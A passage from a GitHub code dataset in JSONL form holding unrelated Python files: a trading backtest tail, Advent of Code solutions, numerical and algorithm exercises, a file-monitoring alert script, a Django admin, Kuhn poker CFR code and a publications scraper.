daily_returns_strat.fillna(0)\n#avg_daily_rets = daily_returns_strat.mean(axis=1)\n\n#Cumulative returns \n#cum_ret =starting_capital + np.cumsum(daily_returns_strat) #\ncum_ret =(1 + daily_returns_strat).cumprod()\n#cum_long_ret = (1 + avg_long_ret).cumprod()\n#cum_short_ret = (1 + avg_short_ret).cumprod()\n\n##########################################\n#stats for basic strategy\n##########################################\n\nprint(\"Basic strategy: \")\nprint('Significant day effect ')\nmean_ret = cum_ret.tail(1)**(1/8)-1\nprint(\"CAGR \" + str(mean_ret[0]))\nvol = (daily_returns_strat.std()*math.sqrt(252))\nsharpe = mean_ret/vol\nkelly_f = mean_ret/vol**2\nprint(\"Volatility \" + str(vol))\nprint(\"Sharpe \" + str(sharpe[0]))\nprint(\"Kelly fraction \" + str(kelly_f[0]))\n#maxiumum drawdown\nRoll_Max = cum_ret.cummax()\nDaily_Drawdown = cum_ret/Roll_Max - 1.0\nMax_Daily_Drawdown = Daily_Drawdown.cummin()\nprint(\"Max drawdown \" + str(Max_Daily_Drawdown.tail(1)[0]))\n\n#plots\nplt.plot(cum_ret)\n#plt.plot(cum_long_ret)\n#plt.plot(cum_short_ret)\n#plt.plot(Daily_Drawdown)\n\n\n###################################################\n#modified strategy considering factor momentum\n####################################################\n\n#calculate rolling sharpe ratio of basic strategy\n#rolling_vol = daily_returns_strat.shift(1).rolling(100).std()\n#rolling_return = cum_ret.pct_change(100).shift(1)\n#strat_rolling_sharpe = rolling_return/rolling_vol\n\nmom_cum_ret = (1+daily_returns_strat[cum_ret.pct_change(40).shift(1) > 0]).cumprod()\n#mom_cum_ret = (1+daily_returns_strat[strat_rolling_sharpe > 0.5]).cumprod()\n#mom_cum_ret = starting_capital + np.cumsum(daily_returns_strat[cum_ret.pct_change(20).shift(1) > 0])\nmom_daily_ret_RE = mom_cum_ret.pct_change()\n\nmom_mean_ret = mom_cum_ret.tail(1)**(1/8)-1\n\nmom_vol = (daily_returns_strat[cum_ret.pct_change(40).shift(1) > 0].std()*math.sqrt(252))\nmom_sharpe = mom_mean_ret/mom_vol\nmom_kelly_f = mom_mean_ret/mom_vol**2\n\n#maxiumum drawdown\nmom_Roll_Max = mom_cum_ret.cummax()\nmom_Daily_Drawdown = mom_cum_ret/mom_Roll_Max - 1.0\nmom_Max_Daily_Drawdown = mom_Daily_Drawdown.cummin()\nprint(\" \")\nprint(\"Factor momentum: \")\nprint('Significant day effect with momentum ')\nprint(\"CAGR \" + str(mom_mean_ret[0]))\nprint(\"Volatility \" + str(mom_vol))\n\nprint(\"Sharpe \" + str(mom_sharpe[0]))\nprint(\"Kelly fraction \" + str(mom_kelly_f[0]))\n#maxiumum drawdown\nRoll_Max = cum_ret.cummax()\nDaily_Drawdown = cum_ret/Roll_Max - 1.0\nMax_Daily_Drawdown = Daily_Drawdown.cummin()\nprint(\"Max drawdown \" + str(mom_Max_Daily_Drawdown.tail(1)[0]))\n\n#calculate log returns st reversal momentum strategy and print returns per year\nmom_log_ret_RE = np.log(mom_cum_ret)-np.log(mom_cum_ret.shift(1))\nper = mom_log_ret_RE.index.to_period(\"Y\")\ng = mom_log_ret_RE.groupby(per)\nret_per_year = g.sum()\nprint(\" \")\nprint(\"signigficant day effect with factor momentum returns per year\")\nprint(ret_per_year)\n\n\nper_M = mom_log_ret_RE.index.to_period(\"M\")\ngrouping_month = mom_log_ret_RE.groupby(per_M)\nret_per_month = grouping_month.sum()\n#stats for monthly returns\npercent_positive = ret_per_month[ret_per_month>0].count()/ret_per_month.count()\nprint(\"\")\nprint(\"percent positive months \" + str(percent_positive))\n\n\nplt.plot(mom_cum_ret)\n\n################\n#buy and hold\n#################\n\navg_ret_boh= ret_daily.mean(axis=1)\ncum_ret_boh = (1 + avg_ret_boh).cumprod()\n#avg_ret_boh= starting_capital*ret_daily.mean(axis=1)\n#cum_ret_boh = starting_capital + np.cumsum(avg_ret_boh)\nplt.plot(cum_ret_boh)\n\n#stats buy and hold\nprint(\" Buy and Hold \")\nprint('Buy and hold stats')\nboh_mean_ret = cum_ret_boh.tail(1)**(1/8)-1\nboh_vol = (avg_ret_boh.std()*math.sqrt(252))\nboh_sharpe = boh_mean_ret/boh_vol\nboh_kelly_f = boh_mean_ret/boh_vol**2\n\n#maxiumum drawdown\nboh_Roll_Max = cum_ret_boh.cummax()\nboh_Daily_Drawdown = cum_ret_boh/boh_Roll_Max - 1.0\nboh_Max_Daily_Drawdown = boh_Daily_Drawdown.cummin()\n\nprint(\"CAGR \" + str(boh_mean_ret[0]))\nprint(\"Volatility \" + str(boh_vol))\n\nprint(\"Sharpe \" + str(boh_sharpe[0]))\nprint(\"Kelly fraction \" + str(boh_kelly_f[0]))\n\nprint(\"Max drawdown \" + str(boh_Max_Daily_Drawdown.tail(1)[0]))\n\n\nprint(\" \")\nprint('40-day momentum of significant day effect strategy')\nprint(cum_ret.pct_change(40).tail(1))\n\n","repo_name":"RS1987X/Significant-day-effect","sub_path":"post significant day return large mid caps.py","file_name":"post significant day return large mid caps.py","file_ext":"py","file_size_in_byte":11168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25169679415","text":"#!/usr/bin/env python3\n\nimport cairo\nimport math\nfrom aoc import check_solution, save_solution, test_eq\n\nDAY = 16\n\n\ndef get_input(filename):\n with open(filename, 'r') as input_file:\n lines = input_file.read()\n return lines.splitlines()\n\n\nHEX_TO_BIN = {\n '0': '0000',\n '1': '0001',\n '2': '0010',\n '3': '0011',\n '4': '0100',\n '5': '0101',\n '6': '0110',\n '7': '0111',\n '8': '1000',\n '9': '1001',\n 'A': '1010',\n 'B': '1011',\n 'C': '1100',\n 'D': '1101',\n 'E': '1110',\n 'F': '1111',\n}\n\n\ndef to_binary(packet):\n binary = []\n print(packet)\n for char in packet:\n binary.append(HEX_TO_BIN[char])\n return \"\".join(binary)\n\n\ndef to_num(binary):\n num = 0\n for bit in binary:\n num *= 2\n if bit == '1':\n num += 1\n return num\n\n\ndef parse_literal(bmsg, pos):\n last = False\n literal_value = []\n while not last:\n if bmsg[pos] == '0':\n last = True\n literal_value.append(bmsg[pos+1:pos+5])\n pos += 5\n return to_num(\"\".join(literal_value)), pos\n\n\ndef parse_operator(bmsg, pos, packet):\n packet['lenght_type_id'] = to_num(bmsg[pos])\n if packet['lenght_type_id'] == 0:\n packet['subpackets_bit_length'] = to_num(bmsg[pos + 1:pos + 16])\n pos += 16\n parse_to = pos + packet['subpackets_bit_length']\n # print(pos, parse_to)\n while pos < parse_to:\n subpacket, pos = parse_packet(bmsg, pos)\n packet['subpackets'].append(subpacket)\n # print(pos, parse_to)\n else:\n packet['subpackets_num'] = to_num(bmsg[pos + 1:pos + 12])\n # print(bmsg[pos + 1:pos + 12])\n pos += 12\n for _ in range(packet['subpackets_num']):\n subpacket, pos = parse_packet(bmsg, pos)\n packet['subpackets'].append(subpacket)\n # print(pos, num_packet)\n\n calc_value(packet)\n return packet['value'], pos\n\n\ndef multiply_packet_values(packets):\n prod = 1\n for packet in packets:\n prod *= packet['value']\n return prod\n\n\ndef packet_greater(packets):\n if packets[0]['value'] > packets[1]['value']:\n return 1\n return 0\n\n\ndef packet_less(packets):\n if packets[0]['value'] < packets[1]['value']:\n return 1\n return 0\n\n\ndef packet_equal(packets):\n if packets[0]['value'] == packets[1]['value']:\n return 1\n return 0\n\n\ndef calc_value(packet):\n packet_type_operation = {\n 0: lambda packets: sum([packet['value'] for packet in packets]),\n 1: multiply_packet_values,\n 2: lambda packets: min([packet['value'] for packet in packets]),\n 3: lambda packets: max([packet['value'] for packet in packets]),\n 5: packet_greater,\n 6: packet_less,\n 7: packet_equal,\n }\n subpackets = packet['subpackets']\n packet['value'] = packet_type_operation[packet['type_id']](subpackets)\n return packet['value']\n\n\ndef parse_packet(bmsg, pos):\n packet = {'subpackets': []}\n packet['version'] = to_num(bmsg[pos:pos + 3])\n packet['type_id'] = to_num(bmsg[pos + 3:pos + 6])\n pos += 6\n if packet['type_id'] == 4:\n packet['value'], pos = parse_literal(bmsg, pos)\n else:\n _value, pos = parse_operator(bmsg, pos, packet)\n return packet, pos\n\n\ndef sum_versions(packet):\n versions = packet['version']\n for subpacket in packet['subpackets']:\n versions += sum_versions(subpacket)\n return versions\n\n\ndef draw_packets(packet):\n surface = cairo.SVGSurface('images/day16.svg', 1900, 1800)\n ctx = cairo.Context(surface)\n ctx.select_font_face('Sans Serif')\n ctx.set_font_size(12)\n\n ctx.set_source_rgb(0.9, 0.9, 0.8)\n ctx.rectangle(1, 1, 1899, 1299)\n ctx.fill()\n draw_packet(ctx, packet, 950, 30, 1800)\n\n surface.flush()\n surface.finish()\n\n\ndef draw_packet(ctx, packet, x, y, width):\n num_sp = len(packet['subpackets'])\n if num_sp != 0:\n ctx.set_source_rgb(0.0, 0.0, 0.0)\n ctx.set_line_width(1)\n step_len = width / (num_sp + 1)\n for i, subpacket in enumerate(packet['subpackets']):\n ctx.move_to(x, y)\n next_x = x - (num_sp / 2 - i) * step_len\n next_y = y + math.pow(width, 0.3) * 50\n ctx.line_to(next_x, next_y)\n ctx.stroke()\n draw_packet(ctx, subpacket, next_x, next_y, step_len)\n ctx.set_source_rgb(1.0, 1.0, 1.0)\n ctx.arc(x, y, 20, 0, 2 * math.pi)\n ctx.fill()\n ctx.set_source_rgb(0.0, 0.0, 0.0)\n ctx.arc(x, y, 20, 0, 2 * math.pi)\n ctx.stroke()\n ctx.move_to(x - 10, y - 2)\n type_sym = ['+', '*', 'mn', 'mx', 'v', '>', '<', '=']\n ctx.show_text(f\"{type_sym[packet['type_id']]}\")\n ctx.move_to(x - 17, y + 10)\n ctx.show_text(f\"{packet['value']}\")\n\n\ndef part1(data):\n binary = to_binary(data[0])\n packet, _pos = parse_packet(binary, 0)\n # print(packet, pos, binary[pos:])\n return sum_versions(packet)\n\n\ndef part2(data):\n binary = to_binary(data[0])\n packet, _pos = parse_packet(binary, 0)\n draw_packets(packet)\n return packet['value']\n\n\ndef run_tests():\n test_input_1 = get_input(f'ex{DAY}')\n print('Test Part 1:')\n test_eq('Test 1.1', part1, 6, test_input_1)\n test_eq('Test 1.2', part1, 9, get_input('ex16_2'))\n test_eq('Test 1.3', part1, 14, get_input('ex16_22'))\n test_eq('Test 1.4', part1, 16, get_input('ex16_3'))\n test_eq('Test 1.5', part1, 12, get_input('ex16_4'))\n test_eq('Test 1.6', part1, 23, get_input('ex16_5'))\n test_eq('Test 1.7', part1, 31, get_input('ex16_6'))\n print()\n\n print('Test Part 2:')\n test_eq('Test 2.1', part2, 3, ['C200B40A82'])\n test_eq('Test 2.2', part2, 54, ['04005AC33890'])\n test_eq('Test 2.3', part2, 7, ['880086C3E88112'])\n test_eq('Test 2.4', part2, 9, ['CE00C43D881120'])\n test_eq('Test 2.5', part2, 1, ['D8005AC2A8F0'])\n test_eq('Test 2.6', part2, 0, ['F600BC2D8F'])\n test_eq('Test 2.7', part2, 0, ['9C005AC2F8F0'])\n test_eq('Test 2.8', part2, 1, ['9C0141080250320F1802104A08'])\n print()\n\n\ndef run_part1(solved):\n data = get_input(f'input{DAY}')\n\n result1 = part1(data)\n print('Part 1:', result1)\n if solved:\n check_solution(DAY, 1, result1)\n else:\n save_solution(DAY, 1, result1)\n\n\ndef run_part2(solved):\n data = get_input(f'input{DAY}')\n\n result2 = part2(data)\n print('Part 2:', result2)\n if solved:\n check_solution(DAY, 2, result2)\n else:\n save_solution(DAY, 2, result2)\n\n\ndef main():\n run_tests()\n run_part1(True)\n run_part2(True)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"remowxdx/AoC-2021","sub_path":"aoc16.py","file_name":"aoc16.py","file_ext":"py","file_size_in_byte":6570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72824813172","text":"__all__ = ['dynamics_RK4']\n\nimport numpy as onp\n\ndef dynamics_RK4(OdeFun, tspan, x, u, v):\n \"\"\"\n # RK4 integrator for a time-invariant dynamical system under a control, u,\n and disturbance, v.\n\n # See https://lpsa.swarthmore.edu/NumInt/NumIntFourth.html\n\n This impl adopted from unstable-zeros's learning CBFs example for two airplanes\n\n https://github.com/unstable-zeros/learning-cbfs/blob/master/airplane_example/learning_cbfs_airplane.ipynb\n\n This function must be called within a loop for a total of N\n steps of integration, Obviously, the smallet the value of T, the better\n\n Inp.ts:\n OdeFun: Right Hand Side of Ode function to be integrated\n tspan: A list [start, end] that specifies over what time horizon to integrate the dynamics\n x: State, must be a list, initial condition\n u: Control, must be a list\n v: Disturbance, must be a list\n\n Author: Lekan Molu, August 09, 2021\n \"\"\"\n M = 4 # RK4 steps per interval\n h = 0.2 # time step\n if onp.any(tspan):\n hh = (tspan[1]-tspan[0])/10/M\n X = onp.array(x)\n U = onp.array(u)\n V = onp.array(v)\n\n for j in range(M):\n if onp.any(tspan): # integrate for this much time steps\n for h in np.arange(tspan[0], tspan[1], hh):\n k1 = OdeFun(X, U, V)\n k2 = OdeFun(X + h/2 * k1, U, V)\n k3 = OdeFun(X + h/2 * k2, U, V)\n k4 = OdeFun(X + h * k3, U, V)\n\n X = X+(h/6)*(k1 +2*k2 +2*k3 +k4)\n else:\n k1 = OdeFun(X, U, V)\n k2 = OdeFun(X + h/2 * k1, U, V)\n k3 = OdeFun(X + h/2 * k2, U, V)\n k4 = OdeFun(X + h * k3, U, V)\n\n X = X+(h/6)*(k1 +2*k2 +2*k3 +k4)\n\n return list(X)\n","repo_name":"IgiArdiyanto/LevelSetPy","sub_path":"ExplicitIntegration/Integration/runge_kutta4.py","file_name":"runge_kutta4.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38957048454","text":"# Contains the definition of the is_prime function\nfrom math import sqrt\n\ndef is_prime(n):\n \"\"\" Returns True if nonnegative integer n is prime; \n otherwise, returns false \"\"\"\n if n == 2: # 2 is the only even prime number\n return True\n if n < 2 or n % 2 == 0: # Handle simple cases immediately\n return False # No evens and nothing less than 2\n trial_factor = 3\n root = sqrt(n)\n while trial_factor <= root:\n if n % trial_factor == 0: # Is trial factor a factor?\n return False # Yes, return right away\n trial_factor += 2 # Next potential factor, skip evens\n return True # Tried them all, must be prime\n\n\ndef prime_sequence(begin, end):\n \"\"\" Generates the sequence of prime numbers between begin and end. \"\"\"\n for value in range(begin, end + 1):\n if is_prime(value): # See if value is prime\n yield value # Produce the prime number\n\n\ndef main():\n \"\"\" Experiments with the prime number generator \"\"\"\n min_value = int(input(\"Enter start of range: \"))\n max_value = int(input(\"Enter last of range: \"))\n\n print('Print all the primes from', min_value, 'to', max_value)\n for value in prime_sequence(min_value, max_value):\n print(value, end=' ') # Display the prime number\n print() # Move cursor down to next line\n\n print('Print all the primes in that range that end with digit 3')\n for value in prime_sequence(min_value, max_value):\n if value % 10 == 3: # See if value's ones digit is 3\n print(value, end=' ') # Display the number\n print() # Move cursor down to next line\n\n # Add up all the primes in the range\n sum = 0\n for value in prime_sequence(min_value, max_value):\n sum += value\n print('The sum of the primes in that range is', sum)\n\n # Decorate the output\n print('Fancier display')\n for value in prime_sequence(min_value, max_value):\n print('<' + str(value) + '>', end='')\n\n\nif __name__ == '__main__':\n main() # Run the program\n","repo_name":"halterman/PythonBook-SourceCode","sub_path":"Chap8/generatedprimes.py","file_name":"generatedprimes.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"21"} +{"seq_id":"31264267066","text":"''' https://www.acmicpc.net/problem/20053\t최소, 최대 2\t\t\n문제\nN개의 정수가 주어진다. 이때, 최솟값과 최댓값을 구하는 프로그램을 작성하시오.\n\n입력\n첫째 줄에 테스트 케이스의 개수 T (1 ≤ T ≤ 10)\ntc의 첫째 줄에 정수의 개수 N (1 ≤ N ≤ 1,000,000)이 주어진다. \ntc 둘째 줄에는 N개의 정수를 공백으로 구분해서 주어진다. 모든 정수는 -1,000,000보다 크거나 같고, 1,000,000보다 작거나 같은 정수이다.\n\n출력\n각 테스트 케이스마다 주어진 정수 N개의 최솟값과 최댓값을 공백으로 구분해 한 줄에 하나씩 차례대로 출력한다.\n\n\n '''\ntc = int(input())\n\nfor _ in range(tc):\n int_n = int(input())\n li = list(map(int, input().split()))\n print(min(li),max(li))\n ","repo_name":"2023cote/2022cote_eunseo","sub_path":"implementation/04_20053.py","file_name":"04_20053.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23427105400","text":"import os, time\nimport signal\nimport smtplib\nfrom email.Header import Header\nfrom email.Utils import parseaddr, formataddr\nfrom email.mime.text import MIMEText\n\n\nMONITORING_DIR = '/var/pdffiller/pdffiller-stack/' # path of the directory which should be monitored\n\nTIME_LIMIT = 60 # time limit. if It was esceeded all processes with target_string in description will be stopped\n\nSUBJECT = \"Too long time for pdf processing\" # subject of notification mail\n\nMSG_TEXT = (\"Following files were processed \"\n \"longer then %d seconds: {{FILENAMES}}\" % TIME_LIMIT) # body of notification mail\n # {{FILENAMES}} is placeholder for list of file namess separated by semicolumn\n\nSERVER = \"localhost\" # mail server\n\nSENDER = u\"Monitoring bot <support@pdffiller.com>\" #sender address\n\nRECIPIENTS = [\"<koshevchenko@gmail.com>\",\n \"<6178773156@txt.att.net>\",\n \"<support@pdffiller.com>\"] #recipient addresses\n\nTARGET_STRING = 'swfdaemon_corrected' # processes with such string in description will be stopped\n # if time be exceeded\n\nHARD_STOP_SERVICE = False # Wheteher found services should be stopped or just notify via mail about time exceeding\n\nDAEMON_STOP_STRING = 'python /var/pdffiller/swfdaemon_corrected.py stop'\n\nDAEMON_START_STRING = 'python /var/pdffiller/swfdaemon_corrected.py start'\n\nNUMBER_OF_OUTDATED_FILES = 5 # min Number of outdated files when service should be restarted\n\ndef send_mail(server, sender, recipient, subject, body):\n msg = MIMEText(body)\n\n header_charset = 'ISO-8859-1'\n\n # Split real name (which is optional) and email address parts\n\n sender_name, sender_addr = parseaddr(sender)\n recipient_name, recipient_addr = parseaddr(recipient)\n\n # We must always pass Unicode strings to Header, otherwise it will\n # use RFC 2047 encoding even on plain ASCII strings.\n sender_name = str(Header(unicode(sender_name), header_charset))\n recipient_name = str(Header(unicode(recipient_name), header_charset))\n\n # Make sure email addresses do not contain non-ASCII characters\n sender_addr = sender_addr.encode('ascii')\n recipient_addr = recipient_addr.encode('ascii')\n\n # Create the message ('plain' stands for Content-Type: text/plain)\n #msg = MIMEText(msg.encode(body_charset), 'plain', body_charset)\n msg['From'] = formataddr((sender_name, sender_addr))\n msg['To'] = formataddr((recipient_name, recipient_addr))\n msg['Subject'] = Header(unicode(subject), header_charset)\n\n server = smtplib.SMTP(server)\n time.sleep(0.3)\n server.sendmail(sender, recipient, msg.as_string())\n server.quit()\n\ndef analize_dir(dir_name, time_limit):\n pathes = [os.path.join(dir_name, i) for i in os.listdir(dir_name)]\n change_times = [(i, time.time() - os.lstat(i).st_ctime) for i in pathes]\n return [f_n for f_n, c_t in change_times if c_t > time_limit]\n\nknown_files = set()\nwhile True:\n outdated_files = analize_dir(MONITORING_DIR, TIME_LIMIT)\n if len(outdated_files) >= NUMBER_OF_OUTDATED_FILES:\n msg = MSG_TEXT.replace('{{FILENAMES}}', '; '.join(outdated_files))\n if set(outdated_files) - known_files:\n for RECIPIENT in RECIPIENTS:\n send_mail(SERVER, SENDER, RECIPIENT, SUBJECT, msg)\n known_files.update(outdated_files)\n if HARD_STOP_SERVICE:\n f = os.popen('ps ax')\n processes = [i for i in f.readlines() if TARGET_STRING in i]\n f.close()\n process_ids = [int(i.strip().split(' ', 1)[0]) for i in processes]\n for pid in process_ids:\n os.kill(pid, signal.SIGKILL)\n else:\n os.system(DAEMON_STOP_STRING)\n os.system(DAEMON_START_STRING)\n time.sleep(1)\n","repo_name":"assasinbox/pdf2swf_converter","sub_path":"monitoring.py","file_name":"monitoring.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"24551880656","text":"from pynput import keyboard\nfrom pynput.keyboard import Key\n\nl = None\n\ndef press(k):\n print(k)\n if k == Key.enter:\n l.stop()\n\nwith keyboard.Listener(on_press=press) as listener:\n l = listener\n listener.join()\n\n\nprint(\"end\")\n","repo_name":"BaumGmbH/python-projects","sub_path":"TypeRace Winner/key.py","file_name":"key.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35509966875","text":"def binary_search(list,target):\n first = 0\n last = len(list)-1\n #any programming language is that way \n # floor division operator //\n while first <= last:\n midpoint = (first+last)//2\n # best case scenario \n # first is equal to the last \n if list[midpoint] == target:\n return midpoint\n elif list[midpoint] < target:\n first = midpoint+1\n else:\n last = midpoint - 1\n return None\n\ndef verify(index):\n if index is not None:\n print(\"Target found at index\",index)\n else:\n print(\"Target not found in list\")\n\n# if we have the empty loop the while is never activated\nnumbers= [1,2,3,4,5,6,7,8,9,10]\n\n# if the list not unsorted the binary search may not work\n\nresult = binary_search(numbers,6)\nverify(result)","repo_name":"davidsunjunjie/artifical_intelligence","sub_path":"binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38899751373","text":"from django.contrib import admin\nfrom rest_framework.reverse import reverse_lazy\n\nfrom order.models import OrderItem, Order\n\nfrom utils.signals import new_order_confirmation\n\n\nclass OrderItemInline(admin.TabularInline):\n model = OrderItem\n extra = 0\n fields = ['assortment', 'price', 'quantity', 'get_company']\n readonly_fields = ['assortment', 'price', 'get_company']\n\n def get_readonly_fields(self, request, obj=None):\n if obj.status == Order.Status.NEW:\n return ['assortment', 'price', 'get_company']\n return ['assortment', 'price', 'quantity', 'get_company']\n\n\n@admin.register(Order)\nclass OrderAdmin(admin.ModelAdmin):\n inlines = [\n OrderItemInline\n ]\n list_display = ['id', 'status', 'date', 'get_items_count', 'get_items_sum']\n\n def save_form(self, request, form, change):\n order = Order.objects.get(id=request.resolver_match.kwargs.get('object_id'))\n if order.status == Order.Status.NEW and request.POST.get('status') == Order.Status.IN_PROGRESS:\n new_order_confirmation.send(\n sender=self.__class__,\n order_number=order.id,\n order_url=reverse_lazy('order-detail', request=request, args=[order.id]),\n to_address=order.recipient_email,\n last_name=order.recipient_last_name,\n first_name=order.recipient_first_name,\n )\n return super(OrderAdmin, self).save_form(request, form, change)\n","repo_name":"Zippelin/DemoShop","sub_path":"docker/web/app/shop/order/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19163923459","text":"import os\nfrom itertools import combinations\n\n\nos.chdir('tasks/task27/homework/01_PairsStatic/n14/')\n\n\ndef solution(var):\n \"\"\"Анализ\n\n 12: * * 3 4\n 12: * 2 2 3\n\n \"\"\"\n f = open(f'27{var}.txt', mode='r')\n n = int(f.readline())\n m = [[] for _ in range(12)]\n for _ in range(n):\n x = int(f.readline())\n m[x % 12].append(x)\n\n a = []\n for i in range(12):\n m[i].sort()\n a.extend(m[i][-4:])\n \n ans = []\n for x, y, w, z in combinations(a, 4):\n if x * y * w * z % 12 == 0:\n ans.append(x + y + z + w)\n print(max(ans))\n \n\nsolution('A')\nsolution('B')","repo_name":"Richtermnd/Exams","sub_path":"tasks/task27/homework/01_PairsStatic/n14/n14.py","file_name":"n14.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10675383752","text":"from cfr import *\nfrom khun import *\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom copy import deepcopy as cp\n\ndef truth(alpha):\n s = {}\n s[\"J\"] = np.array([1 - alpha, alpha])\n s[\"Q\"] = np.array([1., 0.])\n s[\"K\"] = np.array([1 - 3*alpha, 3*alpha])\n s[\"Jp\"] = np.array([2./3, 1./3])\n s[\"Qp\"] = np.array([1., 0.])\n s[\"Kp\"] = np.array([0., 1.])\n s[\"Jb\"] = np.array([1., 0.])\n s[\"Qb\"] = np.array([2./3, 1./3])\n s[\"Kb\"] = np.array([0., 1.])\n s[\"Jpb\"] = np.array([1., 0.])\n s[\"Qpb\"] = np.array([2./3 - alpha, alpha + 1./3])\n s[\"Kpb\"] = np.array([0., 1.])\n return s\n\ndef distance(s1, s2):\n out = 0\n for i in s1:\n out += (s1[i][0] - s2[i][0])**2\n return out\n\ndef strat_diff_vs_it(game, T):\n strategy = {}\n cumulated_regret = {}\n cumulated_strategy = {}\n diff = np.zeros(T)\n for t in range(T):\n cards = game.deal()\n cfr_2p(game, cards, 0, 1, 1, strategy, cumulated_regret, cumulated_strategy)\n cfr_2p(game, cards, 1, 1, 1, strategy, cumulated_regret, cumulated_strategy)\n strat = cp(cumulated_strategy)\n if len(strat) >= 12:\n for infoset in strat:\n strat[infoset] /= np.sum(strat[infoset])\n diff[t] = distance(strat, truth(strat[\"J\"][1]))\n return diff\n\nif __name__ == \"__main__\":\n diff = strat_diff_vs_it(Khun(), 2000)\n plt.plot(diff)\n plt.ylabel(\"Sum of Squared Differences\")\n plt.xlabel(\"games\")\n plt.show()\n","repo_name":"vincentcouteaux/pokercfr","sub_path":"compare_khun.py","file_name":"compare_khun.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"41047764789","text":"# Problem: https://adventofcode.com/2020/day/10#part2\n\nfrom pathlib import Path\nfrom functools import lru_cache\n\nINPUT = str(Path(__file__).parent.absolute()) + '/input.txt'\n\njolts = []\n\n# Changed to lru_cache after seeing better implementations\n@lru_cache(16)\ndef split_sum(jolts, curr):\n path = jolts[1:]\n # If diff <= 3, continue adding\n if jolts[0] - curr <= 3:\n # If its the end of the path, return adding 1\n if not path:\n return 1\n else: \n return (\n split_sum(path, jolts[0]) + split_sum(path, curr)\n )\n # No more paths left, diff > 3\n else:\n return 0\n\nwith open(INPUT) as f:\n for line in f.readlines():\n jolts.append(int(line))\n\n jolts.sort()\n\nprint(split_sum(tuple(jolts), 0))\n\n# Result: 86812553324672\n\n\n","repo_name":"gdep/AoC_2020","sub_path":"Python/Day10/Day10_02.py","file_name":"Day10_02.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6343119837","text":"import requests\nfrom bs4 import BeautifulSoup\nimport dateparser\nimport sqlite3\nfrom sys import argv\n\nUSE_CACHE = False\nSAVE_CACHE = False\nSHOW_PREVIEW = False\nDATABASE_NAME = 'data.sqlite'\nPER_PAGE = 1000\nMAX_PAGES = 10\n\n# Debug settings\nif 'debug' in argv:\n USE_CACHE = True\n SAVE_CACHE = True\n SHOW_PREVIEW = True\n MAX_PAGES = 1\n\nSERVER_ROOT = 'http://www.bs.ch'\nSEARCH_URL = '%s/publikationen/content/0.html?limit=%d&offset=%d&searchString=&from=egal&to=egal&organisationUnit=all&orderBy=year&orderType=DESC'\n\nfields = [\n 'title',\n 'subtitle',\n 'image',\n 'link'\n]\n\n\n\ndef save(c, pub_entries):\n for entry in pub_entries:\n entrydata = {\n 'title': None,\n 'subtitle': None,\n 'image': None,\n 'link': None\n }\n a_title = entry.find('td', { 'headers':'title' })\n a_title_anchor = a_title.find('dt').find('a')\n\n entrydata['title'] = a_title_anchor.get_text()\n entrydata['link'] = SERVER_ROOT + a_title_anchor.get('href')\n for dd in a_title.find_all('dd'):\n if not dd.get('class'):\n entrydata['subtitle'] = dd.get_text()\n elif 'image' in dd.get('class'):\n entrydata['image'] = dd.find('img').get('src')\n if entrydata['image'].startswith('/'):\n entrydata['image'] = SERVER_ROOT + entrydata['image']\n\n if SHOW_PREVIEW:\n print(entrydata)\n\n c.execute(\n '''\n INSERT INTO data (\n ''' + ','.join(fields) + '''\n )\n VALUES\n (''' + '?,'*(len(fields)-1) + '''?)\n ''',\n [\n entrydata['title'],\n entrydata['subtitle'],\n entrydata['image'],\n entrydata['link'],\n ]\n )\n\n\ndef run():\n # Set up a fresh database\n conn = sqlite3.connect(DATABASE_NAME)\n c = conn.cursor()\n c.execute('DROP TABLE IF EXISTS data')\n fieldlist = \" text, \".join(fields)\n c.execute(\n 'CREATE TABLE data (' + fieldlist + ')'\n )\n conn.commit()\n\n # Download from cache\n if USE_CACHE:\n for page_count in range(0, MAX_PAGES):\n print (\"Collecting page %d\" % page_count)\n f = open('_cache/%d.html' % page_count, 'r')\n cache_data = f.read()\n soup = BeautifulSoup(cache_data, 'html.parser')\n rows = soup.select('tbody tr')\n save(c, rows)\n conn.commit()\n f.close()\n\n # Retrieve from server\n else:\n page_count = 0\n while page_count <= MAX_PAGES:\n print (\"Collecting page %d\" % page_count)\n url = SEARCH_URL % (SERVER_ROOT, PER_PAGE, page_count * PER_PAGE)\n page = requests.get(url)\n if 'Keine Publikationen gefunden' in page.text:\n break\n if SAVE_CACHE:\n fw = open('_cache/%d.html' % page_count, 'w')\n fw.write(page.text)\n print (\"Cached page %d\" % page_count)\n fw.close()\n soup = BeautifulSoup(page.content, 'html.parser')\n rows = soup.select('tbody tr')\n save(c, rows)\n conn.commit()\n page_count = page_count + 1\n\n 